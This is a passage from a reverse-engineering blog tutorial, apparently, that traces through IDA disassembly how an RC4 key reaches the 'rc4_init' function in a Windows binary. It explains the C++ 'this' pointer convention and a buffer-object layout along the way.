<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Well, here we are... we found the key... but are we done? Usually the answer would be "yes", but in this case there's more work to do and this is where the code becomes intricate.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: large;"><u>Tracking the key</u></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><div>
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now we know that the key is passed to the "rc4_init" function as the first argument and we want to track it back to see its content. So, we follow the code using the Cross References and notice that eax corresponds to <i>arg_0</i>, as it is pushed right before the call to "rc4_init":</span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E69F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call get_key_object</span></span></span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A5</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A8</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call rc4_init</span></span></div>
<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">What about eax?</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It comes from the "get_key_object" call, from which we get:</span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C537</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C53A</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, [eax+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Ch] </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C53D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> add eax, [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">8</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C540</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> retn</span></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><u>A little remark</u>: as a convention, the C++ "this" pointer is stored in the <i>ecx</i> registry. If you are interested in reversing C++ applications you should read <a href="http://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf">this paper</a> as a starting point. More info about the "this" pointer can be found <a href="http://msdn.microsoft.com/en-us/library/y0dddwwd(v=vs.80).aspx">here</a>.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Basically, the code above reads a pointer and then adds something to it, leading to the final pointer to the key. In particular, you can picture the whole code as "memory buffer" object, that contains a pointer to the data and an index to access it.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Something like this:</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> this</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 00 | ... | Obj_data</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+ +---------------+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 04 | ptr Obj_data | ---> | ... | 00</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+ +---------------+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> 08 | Index | | ... | 04</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+ +---------------+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | ... | | ... | 08 Key</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+ +--+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | ptr byte Key | 0C ---> | | 0</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +---------------+ +--+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> | ... | | | 1</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> +--+</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> |..| 2</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now we have to follow <i>ecx</i> before "get_key_object" is called, and we see:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E69C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [ebp+var_20]</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So, we want to investigate when "var_20" is filled with a value.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E67F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov esi, ecx</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E681</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push [ebp+arg0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E684</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea eax, [ebp+var_20]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E687</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ebx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">108</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E68D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E68E</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call key_from_arg0?</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">From the code above we may think that the key is passed through <i>arg0</i>, but if we try to follow <i>arg0</i> via Cross Reference we don't go very far:</span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5CE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp+var_20]</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D3</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D4</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xor ebx, ebx</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D6</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call instantiate_object</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5DB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov byte ptr [ebp+var_4], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">2</span></span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5DF</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5E0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ecx, esi</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5E2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call do_rc4</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i>arg0</i> is the first parameter of the function we were in, before the Cross Reference, let's call it "do_rc4"; so we have to follow <i>eax</i>, that is the return value of the "instantiate_object" function. This call takes <i>0</i> and <i>var_20</i> as its parameters and returns an empty object.</span></div>
<br />
Dead point, indeed... or maybe not! Let's reconsider the parameters passed to the "key_from_arg0?" function: maybe the parameter we are interested in isn't passed via stack, but via register... Maybe the missing piece is the instruction:<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E687</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ebx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">108</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></span><br />
<br />
<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span>and we have to follow <i>esi+108h</i> instead of <i>arg0</i>!<br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">At the top of the "do_rc4" function we notice:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E67F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov esi, ecx</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So, <i>esi+108h</i> is passed to the "do_rc4" function, via the "this" pointer.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now let's follow back the cross reference; if we scroll up the code we notice:</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push [ebp+p_key_bytes]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B5</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ebx, [ebp+arg_8]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B8</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">108</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5BE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5BF</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esi], offset off_10073520</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5C5</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call instantiate_object</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">This totally makes sense! There is a second call to the "instantiate_object" function and this time its parameters are <i>p_key_bytes</i> and <i>esi+108h</i>. It makes us think that this function creates an object with the bytes of the key from <i>p_key_bytes</i> and puts its address in <i>esi+108h</i>.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
